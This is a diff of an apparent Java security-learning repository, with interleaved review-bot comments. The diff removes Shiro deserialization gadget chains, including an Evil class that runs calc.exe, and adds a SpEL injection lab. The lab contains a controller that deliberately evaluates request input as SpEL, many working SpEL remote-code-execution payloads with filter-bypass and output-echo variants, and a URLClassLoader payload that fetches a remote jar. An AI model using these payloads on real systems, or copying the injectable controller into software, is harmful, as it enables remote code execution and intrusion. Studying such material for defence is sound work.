- // 生成序列化字符串 - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(queue); - oos.close(); - - return barr.toByteArray(); - } -} diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java deleted file mode 100644 index 7bb2cc9..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java +++ /dev/null 
@@ -1,55 +0,0 @@ -package com.govuln.shiroattack; - -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - - -public class CommonsCollections6 { - public byte[] getPayload(String command) throws Exception { - Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; - Transformer[] transformers = new Transformer[] { - new ConstantTransformer(Runtime.class), - new InvokerTransformer("getMethod", new Class[] { String.class, - Class[].class }, new Object[] { "getRuntime", - new Class[0] }), - new InvokerTransformer("invoke", new Class[] { Object.class, - Object[].class }, new Object[] { null, new Object[0] }), - new InvokerTransformer("exec", new Class[] { String.class }, - new String[] { command }), - new ConstantTransformer(1), - }; - Transformer transformerChain = new ChainedTransformer(fakeTransformers); - - // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap - Map innerMap = new HashMap(); - Map outerMap = LazyMap.decorate(innerMap, transformerChain); - - TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); - - Map expMap = new HashMap(); - expMap.put(tme, "valuevalue"); - - outerMap.remove("keykey"); - - Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); - f.setAccessible(true); - f.set(transformerChain, transformers); - - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(expMap); - oos.close(); - - return barr.toByteArray(); - } -} 
diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java deleted file mode 100644 index cb0e46a..0000000 --- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java +++ /dev/null 
@@ -1,51 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; - -import java.io.ByteArrayOutputStream; -import java.io.ObjectOutputStream; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - -public class CommonsCollectionsShiro { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public byte[] getPayload(byte[] clazzBytes) throws Exception { - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - Transformer transformer = new InvokerTransformer("getClass", null, null); - - Map innerMap = new HashMap(); - Map outerMap = LazyMap.decorate(innerMap, transformer); - - TiedMapEntry tme = new TiedMapEntry(outerMap, obj); - - Map expMap = new HashMap(); - expMap.put(tme, "valuevalue"); - - outerMap.clear(); - setFieldValue(transformer, "iMethodName", "newTransformer"); - - // ================== - // 生成序列化字符串 - ByteArrayOutputStream barr = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(barr); - oos.writeObject(expMap); - oos.close(); - - return barr.toByteArray(); - } -} \ No newline at end of file diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java deleted file mode 100644 index 0336572..0000000 
--- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.govuln.shiroattack; - -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; - -public class Evil extends AbstractTranslet { - public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} - - public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} - - public Evil() throws Exception { - super(); - System.out.println("Hello TemplatesImpl"); - Runtime.getRuntime().exec("calc.exe"); - } -} \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" new file mode 100644 index 0000000..35410ca 
--- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" new file mode 100644 index 0000000..d23f859 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" new file mode 100644 index 0000000..60f55d4 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/pom.xml" @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + SPEL + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.apache.commons + commons-io + 1.3.2 + + + + \ No newline at end of file 
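Review bot: The commons-io dependency in the new SPEL pom.xml is declared under `org.apache.commons:commons-io:1.3.2`, which is a stale 2007-era artifact coordinate; the maintained releases of the library are published as `commons-io:commons-io`, so this pom pins an unpatched build even though `RceEcho.commons_io` states the library is required. Change the two lines to `<groupId>commons-io</groupId>` / `<artifactId>commons-io</artifactId>` and pick a current version. The element names were stripped by the diff rendering, so the groupId/artifactId/version nesting is inferred from line order.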
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar"
new file mode 100644
index 0000000..e7a8d7c
Binary files /dev/null and "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/Exp.jar" differ
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class"
new file mode 100644
index 0000000..d546b9c
Binary files /dev/null and "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/aaa/bbb/Exp.class" differ
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java"
new file mode 100644
index 0000000..316bc4a
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/WebApplication.java"
@@ -0,0 +1,11 @@
+package com.spring;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class WebApplication {
+ public static void main(String[] args) {
+ SpringApplication.run(WebApplication.class, args);
+ }
+}
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java"
new file mode 100644
index 0000000..b8db799
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/spring/controller/TestController.java"
@@ -0,0 +1,36 @@
+package com.spring.controller;
+
+import org.springframework.expression.Expression;
+import org.springframework.expression.common.TemplateParserContext;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import java.io.IOException;
+
+@Controller
+public class TestController {
+ /*由于tomcat对GET请求中的| {} 等特殊字符存在限制(RFC 3986),所以使用POST方法传递参数*/
+ @ResponseBody
+ @PostMapping(value = "/index")
+ public String index(String string) throws IOException {
+ SpelExpressionParser spelExpressionParser = new SpelExpressionParser();
+ Expression expression = spelExpressionParser.parseExpression(string);
+ String out = (String) expression.getValue();
+ out = out.concat(" get");
+ return out;
+ }
+
+ @ResponseBody
+ @PostMapping(value = "/index2")
+ public String index2(String string) throws IOException {
+ SpelExpressionParser spelExpressionParser = new SpelExpressionParser();
+ TemplateParserContext templateParserContext = new TemplateParserContext();
+ /*使用模板解析,传参时需要加上#{}*/
+ Expression expression = spelExpressionParser.parseExpression(string, templateParserContext);
+ Integer out = (Integer) expression.getValue();
+ return Integer.toString(out);
+ }
+}
+
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java"
new file mode 100644
index 0000000..0000a8f
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BasicUsage.java"
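Review bot: `index` and `index2` pass the raw request parameter to `SpelExpressionParser.parseExpression` and evaluate it with the parser's default `StandardEvaluationContext`, which permits type references and reflective method invocation, so both endpoints are unrestricted expression-injection sinks; since this controller appears to be the lab's deliberate target, state that at the class level, e.g. `// INTENTIONALLY VULNERABLE: untrusted input is evaluated as SpEL under the default StandardEvaluationContext`, and mention that the hardened form evaluates with `expression.getValue(SimpleEvaluationContext.forReadOnlyDataBinding().build())`. Independently of injection, `(String) expression.getValue()` throws ClassCastException for any non-string result and `out.concat(" get")` dereferences a null result, so a harmless input such as an arithmetic expression yields a 500 instead of a controlled error response. `throws IOException` is declared on both handlers although nothing in their bodies can throw it.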
@@ -0,0 +1,30 @@
+package com.test;
+
+import org.springframework.expression.Expression;
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.expression.spel.support.StandardEvaluationContext;
+
+public class BasicUsage {
+ public String name = "baka";
+
+ public static void main(String[] args) {
+ usage1();
+ usage2();
+ }
+
+ public static void usage1(){
+ ExpressionParser parser = new SpelExpressionParser();//创建解析器
+ Expression exp = parser.parseExpression("'Hello World'.concat('!')");//解析表达式
+ System.out.println( exp.getValue() );//取值,Hello World!
+ }
+
+ public static void usage2(){
+ BasicUsage user = new BasicUsage();
+ StandardEvaluationContext context=new StandardEvaluationContext();
+ context.setVariable("user",user);//通过StandardEvaluationContext注册自定义变量
+ SpelExpressionParser parser = new SpelExpressionParser();//创建解析器
+ Expression expression = parser.parseExpression("#user.name");//解析表达式
+ System.out.println( expression.getValue(context).toString() );//取值,输出何止
+ }
+}
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BypassTrick.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BypassTrick.java"
new file mode 100644
index 0000000..1153ca2
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/BypassTrick.java"
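Review bot: The trailing comment on the `expression.getValue(context)` line in `usage2` reads `//取值,输出何止`, which looks like a typo; the value printed is the `name` field, so `//取值,输出baka` matches what the demo shows. `public String name = "baka";` is a public mutable field, and the `#user.name` expression appears to rely on that (the default reflective property accessor reads public fields as well as getters); if a later cleanup makes the field private, a `getName()` accessor keeps the example working, which is worth a one-line comment on the field.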
@@ -0,0 +1,16 @@ +package com.test; + +public class BypassTrick { +/** + * // 反射调用+字符串拼接,绕过如javacon题目中的正则过滤 + * T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"}) + * + * new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start() + * + * T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(108)).concat(T(java.lang.Character).toString(99))) + * + * T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval("xxx")) + * + *T(org.springframework.util.StreamUtils).copy(T(javax.script.ScriptEngineManager).newInstance().getEngineByName("JavaScript").eval(T(java.net.URLDecoder).decode("%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29")),) + */ +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/ClassPathXml.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/ClassPathXml.java" new file mode 100644 index 0000000..682900c --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/ClassPathXml.java" @@ -0,0 +1,9 @@ +package com.test; + +import org.springframework.context.support.ClassPathXmlApplicationContext; + +public class ClassPathXml { + public static void main(String[] args) { + ClassPathXmlApplicationContext classPathXmlApplicationContext = new ClassPathXmlApplicationContext("http://127.0.0.1:7777/1.xml"); + } +} 
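Review bot: `ClassPathXml.main` builds a `ClassPathXmlApplicationContext` from an `http://` URL, stores it in a local that is never read, and never closes it; the context is a `ConfigurableApplicationContext` (hence `Closeable`), so the idiomatic form is `try (ClassPathXmlApplicationContext ctx = new ClassPathXmlApplicationContext("http://127.0.0.1:7777/1.xml")) { }`. The class has no comment explaining what it demonstrates; a header such as `// Demo: bean definitions fetched from a remote, unauthenticated URL are instantiated at context refresh` would make the risk being shown explicit to a reader.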
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java"
new file mode 100644
index 0000000..1bd9ac3
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RceEcho.java"
@@ -0,0 +1,50 @@
+package com.test;
+
+import org.springframework.expression.Expression;
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+
+public class RceEcho {
+ public static void main(String[] args) {
+// commons_io();
+// br();
+ scanner();
+ }
+
+ /*必须有commons-io依赖*/
+ public static void commons_io(){
+ String cmdStr = "T(org.apache.commons.io.IOUtils).toString((new java.lang.ProcessBuilder(new String[]{'whoami'}).start()).getInputStream())";
+
+ ExpressionParser parser = new SpelExpressionParser();//创建解析器
+ Expression exp = parser.parseExpression(cmdStr);//解析表达式
+ System.out.println( exp.getValue() );
+ }
+
+ /*仅适用于jdk>=9*/
+ public static void jShell(){
+ String cmdStr = "T(SomeWhitelistedClassNotPartOfJDK).ClassLoader.loadClass(\"jdk.jshell.JShell\",true).Methods[6].invoke(null,{}).eval(\"T(Runtime).getRuntime().exec('whoami')\").toString()";
+
+ ExpressionParser parser = new SpelExpressionParser();//创建解析器
+ Expression exp = parser.parseExpression(cmdStr);//解析表达式
+ System.out.println( exp.getValue() );
+ }
+
+ /*缺点:只能读一行*/
+ public static void br(){
+ String cmdStr = "new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(\"cmd\", \"/c\", \"whoami\").start().getInputStream(), \"gbk\")).readLine()\n";
+
+ ExpressionParser parser = new SpelExpressionParser();
+ Expression exp = parser.parseExpression(cmdStr);
+ System.out.println( exp.getValue() );
+ }
+
+ /*useDelimiter内的参数为分割标志,所以随便填一个,这样回显结果才完整*/
+ public static void scanner(){
+ String cmdStr = "new java.util.Scanner(new java.lang.ProcessBuilder(\"cmd\", \"/c\", \"dir\", \".\").start().getInputStream(), \"GBK\").useDelimiter(\"asfsfsdfsf\").next()\n";
+
+ ExpressionParser parser = new SpelExpressionParser();
+ Expression exp = parser.parseExpression(cmdStr);
+ System.out.println( exp.getValue() );
+ }
+
+}
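Review bot: `jShell` uses `T(SomeWhitelistedClassNotPartOfJDK)` as though it were a real class name and nothing marks it as a placeholder, so the method cannot evaluate as written and a reader has no way to tell that from the code; its comment should say so, e.g. `/*仅适用于jdk>=9; not runnable as written, the T(...) class name is a placeholder*/`. `br` and `scanner` spawn `cmd /c` and decode output as GBK, which makes the class Windows-only, and `main` keeps the other demos as commented-out calls; a class-level Javadoc stating the platform assumption and which demo is active would document both choices.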
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java"
new file mode 100644
index 0000000..942ade1
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart1.java"
@@ -0,0 +1,73 @@ +package com.test; + +import org.springframework.expression.Expression; +import org.springframework.expression.ExpressionParser; +import org.springframework.expression.spel.standard.SpelExpressionParser; + +import javax.script.ScriptEngineFactory; +import javax.script.ScriptEngineManager; +import java.util.List; + +// 如果使用非默认ParserContext,所有payload用#{}包裹 +public class RcePart1 { + public static void main(String[] args) { +// pb(); +// runtime(); +// getEngineFactory(); +// nashorn(); + javascript(); + } + + public static void pb() { + String cmdStr = "new java.lang.ProcessBuilder(new String[]{'calc'}).start()"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } + + public static void runtime() { + String cmdStr = "T(Runtime).getRuntime().exec(new String[]{'cmd.exe', '/c', 'notepad'})"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() ); + } + + public static void getEngineFactory() { + ScriptEngineManager manager = new ScriptEngineManager(); + List factories = manager.getEngineFactories(); + for (ScriptEngineFactory factory: factories){ + System.out.printf( + "Name: %s%n" + "Version: %s%n" + "Language name: %s%n" + + "Language version: %s%n" + + "Extensions: %s%n" + + "Mime types: %s%n" + + "Names: %s%n", + factory.getEngineName(), + factory.getEngineVersion(), + factory.getLanguageName(), + factory.getLanguageVersion(), + factory.getExtensions(), + factory.getMimeTypes(), + factory.getNames() + ); + } + } + + public static void nashorn(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + 
System.out.println( exp.getValue() );//弹出计算器 + } + + public static void javascript(){ + String cmdStr = "new javax.script.ScriptEngineManager().getEngineByName(\"javascript\").eval(\"s=[1];s[0]='calc';java.lang.Runtime.getRuntime().exec(s);\")"; + + ExpressionParser parser = new SpelExpressionParser();//创建解析器 + Expression exp = parser.parseExpression(cmdStr);//解析表达式 + System.out.println( exp.getValue() );//弹出计算器 + } +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" new file mode 100644 index 0000000..dcbe6df --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/RcePart2.java" 
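Review bot: `getEngineFactory` declares `List factories = manager.getEngineFactories();` as a raw type, so the enhanced-for over `ScriptEngineFactory` relies on an unchecked conversion; `ScriptEngineManager.getEngineFactories()` already returns `List<ScriptEngineFactory>`, so `List<ScriptEngineFactory> factories = manager.getEngineFactories();` removes the warning with no other change. The `printf` format string is assembled from literals concatenated across several lines, which is hard to scan; one literal per `%n` segment (or a text block where the project's Java level allows it) reads better, though that is cosmetic. `main` runs only `javascript()` with the other calls commented out, and nothing documents that choice.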
@@ -0,0 +1,45 @@
+package com.test;
+
+import org.springframework.expression.Expression;
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+
+public class RcePart2 {
+ public static void main(String[] args) {
+// urlLoader();
+// appLoader();
+ getAppFromOtherClass();
+ }
+
+ /*打包jar时,如果类在多层包中,打包时一定要把前面几层文件夹也打包进行,jar打开应该是aaa/bbb/Exp.class的形式,这样才能正常loadClass*/
+ public static void urlLoader(){
+ String cmdStr = "new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"http://127.0.0.1:7777/Exp.jar\")}).loadClass(\"aaa.bbb.Exp\").getConstructors()[0].newInstance(\"calc\")";
+
+ ExpressionParser parser = new SpelExpressionParser();//创建解析器
+ Expression exp = parser.parseExpression(cmdStr);//解析表达式
+ System.out.println( exp.getValue() );
+ }
+
+ public static void appLoader(){
+ String cmdStr = "T(ClassLoader).getSystemClassLoader().loadClass(\"java.lang.Runtime\").getRuntime().exec('calc')";
+
+ ExpressionParser parser = new SpelExpressionParser();
+ Expression exp = parser.parseExpression(cmdStr);
+ System.out.println( exp.getValue() );
+ }
+
+ /*我这里利用失败了*/
+ public static void getAppFromOtherClass(){
+ String cmdStr = "T(org.springframework.expression.Expression).getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")";
+
+ ExpressionParser parser = new SpelExpressionParser();
+ Expression exp = parser.parseExpression(cmdStr);
+ System.out.println( exp.getValue() );
+ }
+
+ /*有web上下文的环境使用。不过我本地测试全失败了。而且不知道为什么文章里要加[[${}]]*/
+ public static void getUrlFromInnerClass(){
+ String cmdStr1 = "#request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")";
+ String cmdStr2 = "username[#this.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('xterm')\")]=asdf";
+ }
+}
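Review bot: `getUrlFromInnerClass` assigns `cmdStr1` and `cmdStr2` and never reads them, so the method is dead code kept only as notes; the comment above it already records that the author could not reproduce the technique, so either remove the method or move both strings into that comment so the class carries no unused locals. `main` invokes only `getAppFromOtherClass`, which the comment directly above it marks as a failed attempt (`/*我这里利用失败了*/`), so running the class as committed is expected to fail; a class-level comment stating that would save the next reader from debugging it.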
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" new file mode 100644 index 0000000..b9c3df7 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/java/com/test/tmp.java" @@ -0,0 +1,11 @@ +package com.test; + +import org.springframework.expression.Expression; + +public class tmp { + public static void main(String[] args) throws ClassNotFoundException { + ClassLoader classLoader = Expression.class.getClassLoader(); + System.out.println(classLoader); + Class aClass = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime"); + } +} diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" new file mode 100644 index 0000000..4bd7209 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/1.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" new file mode 100644 index 0000000..9899989 --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/SPEL/src/main/resources/application.yml" @@ -0,0 +1,2 @@ +server: + port: 8083 \ No newline at end of file diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" new file mode 100644 index 0000000..4bdcfcb --- /dev/null +++ "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" @@ -0,0 +1,10 @@ + + + + + $Title$ + + +$END$ + + \ No newline at end of file
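Review bot: `tmp.main` declares `Class aClass = ClassLoader.getSystemClassLoader().loadClass("java.lang.Runtime");` as a raw type and never uses the result, and the class name `tmp` violates the UpperCamelCase convention used elsewhere in this package; `Class<?> aClass` fixes the raw type, and a header comment saying the file is a scratch experiment (or excluding it from the build) would explain why it exists alongside the named demo classes.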